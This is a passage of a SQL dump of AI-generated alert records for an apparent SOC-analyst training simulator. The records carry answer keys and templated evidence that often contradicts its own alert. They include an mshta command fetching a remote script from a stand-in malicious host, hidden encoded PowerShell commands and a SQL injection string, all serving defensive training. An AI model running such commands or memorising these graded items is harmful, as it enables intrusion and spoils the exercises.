Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(669, 'Unauthorized Access Attempt on Database Server', 'high', 'SIEM', 'A potentially unauthorized access attempt was detected on a critical database server from an internal IP.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T22:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.6.33\",\"dst_ip\":\"192.168.1.13\",\"username\":\"dba_admin\",\"hostname\":\"DB-SERVER\",\"failed_attempts\":15}', '2026-01-10 10:37:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.6.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address attempting unauthorized access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"dba_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for unauthorized access attempts.\"}}],\"expected_actions\":[\"reset_credentials\",\"monitor_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts indicate potential unauthorized access.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 
49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(670, 'False Positive: Misinterpreted Network Activity as Data Exfiltration', 'medium', 'Firewall', 'Network activity flagged as potential data exfiltration was verified to be a legitimate backup process.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T23:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.7.44\",\"dst_ip\":\"192.168.1.14\",\"username\":\"backup.svc\",\"hostname\":\"BACKUP-SERVER\",\"data_volume\":\"2.0GB\"}', '2026-01-10 09:03:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.7.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address engaged in backup process.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup.svc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Service account used for legitimate backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network activity verified as legitimate backup process, confirming a false positive.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(671, 'Suspicious Mshta Execution with Malicious Script', 'critical', 'EDR', 'Mshta was executed with a malicious remote script, indicating a potential fileless malware attack.', 'Malware', 'T1218.005', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T23:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.8.55\",\"dst_ip\":\"192.168.1.15\",\"username\":\"tjohnson\",\"hostname\":\"WORKSTATION-TJ\",\"command_line\":\"mshta http://malicious-site.com/malicious-script.hta\"}', '2026-01-10 20:15:05', '2026-02-16 18:03:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta http://malicious-site.com/malicious-script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of a remote HTA script, typical of fileless malware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.8.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Mshta execution with external script URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(672, 'Suspicious Network Connection Detected from Internal to External Host', 'high', 'CrowdStrike', 'A connection attempt was detected from an internal host to a known malicious IP address used for command and control.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.42\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"powershell.exe -encodedcommand SGVsbG8gd29ybGQ=\",\"domain\":\"malicious-site.com\"}', '2026-01-11 03:07:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection to a known malicious IP indicates a true positive for malware communication.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(673, 'Multiple Failed Login Attempts Detected from Foreign IP', 'medium', 'Wazuh', 'A foreign IP address has attempted to login into the corporate VPN with multiple failed attempts, indicating a possible brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:00:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.199.108.153\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"vpn-server\",\"failed_attempts\":25}', '2026-01-10 22:06:55', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for multiple brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and origin of failed login attempts suggest a brute force attack.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin 
from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 
100\"}}', 0),
(674, 'APT Command and Control Communication via Discord', 'critical', 'Splunk', 'Detected command and control traffic using Discord\'s infrastructure, commonly used by APT groups for stealthy communications.', 'Data Exfiltration', 'T1105', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:25:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.5\",\"dst_ip\":\"162.159.138.233\",\"username\":\"alice\",\"hostname\":\"laptop-23\",\"url\":\"https://discordapp.com/api/v9/channels/1234567890/messages\"}', '2026-01-11 12:40:32', '2026-02-16 18:02:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"162.159.138.233\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with Discord C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/v9/channels/1234567890/messages\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Discord API endpoint used for stealthy data exfiltration\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of Discord for C2 traffic is indicative of advanced threat activity.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(675, 'Phishing Attempt via Spoofed Domain', 'high', 'Proofpoint', 'A phishing email was sent to an employee with a spoofed domain mimicking a legitimate service to steal credentials.', 'Phishing', 'T1566', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.20\",\"username\":\"bsmith\",\"hostname\":\"mail-server\",\"email_sender\":\"support@microsfot.com\",\"url\":\"http://fake-login.microsoft.com\"}', '2026-01-10 19:17:54', '2026-02-20 09:08:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@microsfot.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address known for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-login.microsoft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for harvesting credentials\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are indicative of a phishing attempt to harvest credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt via Spoofed Domain\",\"date\":\"2026-02-01T20:32:22.325Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(676, 'Detected Fileless Malware Execution', 'critical', 'EDR', 'A fileless malware was executed in memory using PowerShell, evading traditional file-based detection mechanisms.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T12:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.15\",\"dst_ip\":\"192.168.100.15\",\"username\":\"jsmith\",\"hostname\":\"desktop-12\",\"command_line\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 11:56:38', '2026-02-16 18:04:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command for fileless malware execution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated file, possible fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell for in-memory execution indicates advanced evasion tactics.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(677, 'Suspicious DNS Queries to DGA Domain', 'high', 'Firewall', 'Detected multiple DNS queries to a domain generated by a domain generation algorithm (DGA), often used for botnet communications.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.10.25\",\"dst_ip\":\"198.51.100.50\",\"username\":\"tadmin\",\"hostname\":\"office-pc\",\"domain\":\"a1b2c3d4e5f6g7h8.com\"}', '2026-01-09 22:50:34', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"a1b2c3d4e5f6g7h8.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DGA botnet activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the querying host\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of DGA domains in DNS queries suggests botnet communication.\"}', 'Expert', 'MAL', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(678, 'Web Attack: SQL Injection Attempt Detected', 'high', 'IDS/IPS', 'An attacker attempted an SQL injection attack on the corporate web application, potentially exploiting vulnerabilities to exfiltrate data.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:20:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.100\",\"username\":\"guest\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-09 20:58:06', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body indicates a classic SQL injection attempt, warranting investigation.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET 